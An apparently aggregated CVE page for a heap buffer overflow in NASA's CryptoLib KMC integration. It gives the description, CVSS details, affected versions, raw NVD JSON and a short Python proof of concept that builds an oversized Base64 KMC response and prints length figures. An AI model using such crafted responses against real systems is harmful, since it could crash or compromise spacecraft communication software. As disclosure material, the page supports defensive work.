Security Vulnerability Report
中文
CVE-2026-22697 CVSS 7.5 HIGH

CVE-2026-22697

Published: 2026-01-10 01:16:19
Last Modified: 2026-01-16 16:42:26
Source: [email protected]

Description

CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, CryptoLib’s KMC crypto service integration is vulnerable to a heap buffer overflow when decoding Base64-encoded ciphertext/cleartext fields returned by the KMC service. The decode destination buffer is sized using an expected output length (len_data_out), but the Base64 decoder writes output based on the actual Base64 input length and does not enforce any destination size limit. An oversized Base64 string in the KMC JSON response can cause out-of-bounds writes on the heap, resulting in process crash and potentially code execution under certain conditions. This issue has been patched in version 1.4.3.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:* - VULNERABLE
CryptoLib < 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64 import json # 构造恶意KMC响应,超长Base64字符串触发堆溢出 def generate_malicious_kmc_response(): # 生成超长Base64字符串(超过预期输出长度) oversized_data = b'A' * 10000 # 远超预期的len_data_out malicious_b64 = base64.b64encode(oversized_data).decode('ascii') # 构造恶意JSON响应 malicious_response = { 'cryptographic_service': 'encrypt', 'ciphertext': malicious_b64, 'len_data_out': 1000 # 预期的输出长度 } return json.dumps(malicious_response) # 模拟漏洞触发场景 def trigger_overflow(): response = generate_malicious_kmc_response() data = json.loads(response) ciphertext = data['ciphertext'] expected_len = data['len_data_out'] # 漏洞代码:使用expected_len分配缓冲区 # buffer = malloc(expected_len) # base64_decode(ciphertext, buffer) # 溢出发生 print(f"Expected length: {expected_len}") print(f"Actual Base64 length: {len(ciphertext)}") print(f"Decoded output will exceed buffer by ~{len(base64.b64decode(ciphertext)) - expected_len} bytes") if __name__ == '__main__': trigger_overflow()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22697", "sourceIdentifier": "[email protected]", "published": "2026-01-10T01:16:19.160", "lastModified": "2026-01-16T16:42:26.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, CryptoLib’s KMC crypto service integration is vulnerable to a heap buffer overflow when decoding Base64-encoded ciphertext/cleartext fields returned by the KMC service. The decode destination buffer is sized using an expected output length (len_data_out), but the Base64 decoder writes output based on the actual Base64 input length and does not enforce any destination size limit. An oversized Base64 string in the KMC JSON response can cause out-of-bounds writes on the heap, resulting in process crash and potentially code execution under certain conditions. This issue has been patched in version 1.4.3."}, {"lang": "es", "value": "CryptoLib proporciona una solución únicamente de software utilizando el Protocolo de Seguridad de Enlace de Datos Espaciales CCSDS - Procedimientos Extendidos (SDLS-EP) para asegurar las comunicaciones entre una nave espacial que ejecuta el Sistema de Vuelo central (cFS) y una estación terrestre. Antes de la versión 1.4.3, la integración del servicio criptográfico KMC de CryptoLib es vulnerable a un desbordamiento de búfer de pila al decodificar campos de texto cifrado/texto claro codificados en Base64 devueltos por el servicio KMC. El búfer de destino de decodificación se dimensiona utilizando una longitud de salida esperada (len_data_out), pero el decodificador Base64 escribe la salida basándose en la longitud real de la entrada Base64 y no impone ningún límite de tamaño de destino. Una cadena Base64 sobredimensionada en la respuesta JSON del KMC puede causar escrituras fuera de límites en la pila, lo que resulta en un fallo del proceso y potencialmente la ejecución de código bajo ciertas condiciones. Este problema ha sido parcheado en la versión 1.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.3", "matchCriteriaId": "AE1BE91E-2901-42AF-BC66-762CFA7A2582"}]}]}], "references": [{"url": "https://github.com/nasa/CryptoLib/releases/tag/v1.4.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-qjx3-83jh-2jc4", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-qjx3-83jh-2jc4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.